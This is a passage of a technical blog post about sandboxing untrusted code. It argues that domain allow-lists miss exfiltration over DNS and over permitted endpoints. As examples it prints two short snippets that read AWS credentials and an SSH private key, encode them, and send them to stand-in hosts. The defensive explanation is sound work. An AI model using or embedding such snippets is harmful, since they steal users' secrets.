A Network Allow-List Won't Stop Exfiltration

Summary

Say you run a piece of untrusted code – an AI-generated script, a dependency’s postinstall hook, a build step from a repo you just cloned – inside a sandbox. You lock it down: no filesystem access outside the working directory, no network except the one domain it legitimately needs, no dangerous syscalls. That stops a lot of bad behavior.It also has a blind spot, and it’s a big one.I ran into this building Canister, a lightweight, unprivileged Linux sandbox – it stacks user namespaces, seccomp, and network isolation to run untrusted commands with minimal privileges, no root and no container runtime. But the blind spot below isn’t specific to Canister. It applies to any sandbox whose network policy is a domain allow-list, which is most of them.The problem network allow-lists don’t solveSay you’re running an npm install for a project that needs to reach registry.npmjs.org. You add that domain to your allow-list. The install runs. Everything works.Except the dependency you just installed contains this:const dns = require('dns'); const secrets = require('fs').readFileSync(process.env.HOME + '/.aws/credentials', 'utf8'); const encoded = Buffer.from(secrets).toString('base64'); dns.resolve(`${encoded.substring(0, 60)}.evil.example.com`, () => {}); Your network policy allows DNS. The script exfiltrates your AWS credentials via DNS subdomain lookups. No unauthorized connection. No blocked domain. The data leaves through a channel you explicitly permitted.Or consider a build script that posts logs to an allowed analytics endpoint:import requests, base64, os token = open(os.path.expanduser("~/.ssh/id_ed25519")).read() requests.post("https://allowed-analytics.example.com/log", data={"log": base64.b64encode(token.encode()).decode()}) Your SSH private key, base64-encoded, flows to an endpoint your policy allows. The sandbox did its job. The network filter did its job. The secret still leaked.This is the gap network-level policies can’t close. The threat isn’t just unauthorized c...